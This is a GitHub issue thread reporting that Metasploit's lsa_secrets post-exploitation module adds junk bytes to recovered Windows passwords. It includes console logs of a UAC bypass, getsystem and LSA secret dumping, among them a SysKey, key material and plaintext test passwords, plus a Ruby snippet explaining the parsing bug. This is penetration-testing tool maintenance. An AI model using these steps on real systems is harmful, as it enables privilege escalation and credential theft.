
post/windows/gather/lsa_secrets appends junk data to passwords #10390

Open
bcoles opened this issue Jul 29, 2018 · 3 comments
Labels
bug confirmed Issues confirmed by a committer not-stale Label to stop an issue from being auto closed

Comments

@bcoles
Contributor

bcoles commented Jul 29, 2018

A report on Twitter indicates that lsadump on Metasploit is broken.

Initial tests revealed a bug. No idea if it's the same issue @craigsblackie ?

Junk bytes are appended to recovered passwords. Observe the output below. The passwords are password and redacted, whereas the module returns password |\~ and redactedC[+ QE.

Test system is Windows 7 SP1 x64; with session upgraded via exploit/windows/local/bypassuac and getsystem. Metasploit is latest version from git, running on Ruby 2.3.0.

msf5 exploit(windows/local/bypassuac) > use post/windows/gather/lsa_secrets 
msf5 post(windows/gather/lsa_secrets) > set session 2
session => 2
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[-] Could not retrieve LSA key. Are you SYSTEM?
[*] Post module execution completed
msf5 post(windows/gather/lsa_secrets) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 2? [y/N]  
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[+] Key: DefaultPassword
 Decrypted Value: password |\~

[+] Key: DPAPI_SYSTEM
 Decrypted Value: ,?<lJ.f$*qghGuf2H

[+] Key: _SC_MSSQL$SQLEXPRESS
 Username: NT Service\MSSQL$SQLEXPRESS 
 Decrypted Value: M"Y=aD

[+] Key: _SC_MSSQLSERVER
 Username: NT Service\MSSQLSERVER 
 Decrypted Value: _;N5kN.

[+] Key: _SC_redacted
 Username: .\redacted 
 Decrypted Value:  redactedC[+ QE

[*] Writing to loot...
[*] Data saved in: /root/.msf4/loot/20180728232749_default_172.16.191.153_registry.lsa.sec_660233.txt
[*] Post module execution completed

Compared to kiwi lsa_dump_secrets, which returns the correct value.

meterpreter > lsa_dump_secrets 
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN-SGBSD5TQUTQ
SysKey : 9f288f41951f8dedc8c2011fcef7627f

Local name : WIN-SGBSD5TQUTQ ( S-1-5-21-3721788700-3134539918-2111365127 )
Domain name : WORKGROUP

Policy subsystem is : 1.11
LSA Key(s) : 1, default {b76bab56-d62d-7863-136e-0a0c1ca4bb73}
  [00] {b76bab56-d62d-7863-136e-0a0c1ca4bb73} 6afee2d5c13d317fe515c521f7c165180feba991f27dd8212d6ce93c68383da0

Secret  : DefaultPassword
cur/text: password
old/text: ROOT#123

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 1d 01 9d 3f 3c 80 6c dc 4a 2e d6 66 24 a0 04 af c2 07 2a d8 71 67 13 99 68 ed 47 75 66 32 b9 12 7f 48 c4 f9 a0 be 04 02 
    full: 1d019d3f3c806cdc4a2ed66624a004afc2072ad87167139968ed47756632b9127f48c4f9a0be0402
    m/u : 1d019d3f3c806cdc4a2ed66624a004afc2072ad8 / 7167139968ed47756632b9127f48c4f9a0be0402
old/hex : 01 00 00 00 c9 22 d6 0b 83 9e dd 98 a7 ad 7a 5a c5 ff 4e bb 8a d2 6f 01 61 be bf d4 bc 70 54 70 fd df 46 12 a8 c5 e5 2d 98 6c 79 71 
    full: c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f0161bebfd4bc705470fddf4612a8c5e52d986c7971
    m/u : c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f01 / 61bebfd4bc705470fddf4612a8c5e52d986c7971

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : NT Service\MSSQL$SQLEXPRESS

Secret  : _SC_MSSQLSERVER / service 'MSSQLSERVER' with username : NT Service\MSSQLSERVER

Secret  : _SC_redacted / service 'redacted' with username : .\redacted
cur/text: redacted
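Added illustration, not code from the module or from the thread: the trailing junk is consistent with bytes beyond the secret's declared length being kept. The Ruby snippet below assumes the decrypted plaintext carries a 4-byte little-endian length and 12 reserved bytes ahead of the UTF-16LE secret, followed by padding (an assumption, since the thread does not state the layout or the root cause), and contrasts a parser that takes everything after the header with one that honours the declared length.

```ruby
# Added example (not Metasploit code). Assumed plaintext layout of a
# decrypted LSA secret (assumption, not stated in the thread):
#   bytes  0..3  : little-endian length of the secret
#   bytes  4..15 : reserved/unknown
#   bytes 16..   : secret (UTF-16LE for text secrets), then trailing padding

# Naive parse: keep everything after the 16-byte header, so whatever
# follows the secret is rendered as junk characters.
def secret_naive(plaintext)
  plaintext[16..-1].force_encoding('UTF-16LE')
                   .encode('UTF-8', invalid: :replace, undef: :replace)
end

# Length-aware parse: honour the declared length and drop the padding,
# refusing blobs that are too short or that declare an impossible length.
def secret_by_length(plaintext)
  raise ArgumentError, 'blob too short' if plaintext.bytesize < 16
  len = plaintext[0, 4].unpack('V').first
  raise ArgumentError, 'declared length exceeds blob' if 16 + len > plaintext.bytesize
  plaintext[16, len].force_encoding('UTF-16LE').encode('UTF-8')
end

# Constructed sample blob: the secret 'password' in UTF-16LE followed by
# padding bytes chosen to be printable so the junk is visible.
def sample_blob
  secret  = 'password'.encode('UTF-16LE').b
  padding = " |\\~".encode('UTF-16LE').b
  [secret.bytesize].pack('V') + ("\x00" * 12).b + secret + padding
end

puts secret_naive(sample_blob).inspect      # "password |\\~"
puts secret_by_length(sample_blob).inspect  # "password"
```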
@bcoles bcoles added the bug label Jul 29, 2018
@craigsblackie

Yes, this is the same issue I experienced. Should have submitted this myself, thanks for stepping in!

@github-actions

github-actions bot commented Dec 2, 2020

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Dec 2, 2020
@bcoles bcoles added not-stale Label to stop an issue from being auto closed and removed Stale Marks an issue as stale, to be closed if no action is taken labels Dec 2, 2020
@bcoles
Contributor Author

bcoles commented Dec 2, 2020

Removing the stale label. I'm not sure if this is still an issue. Still an issue in 2022. Someone who isn't me should probably take a look at this.

@bcoles bcoles added the confirmed Issues confirmed by a committer label Aug 14, 2022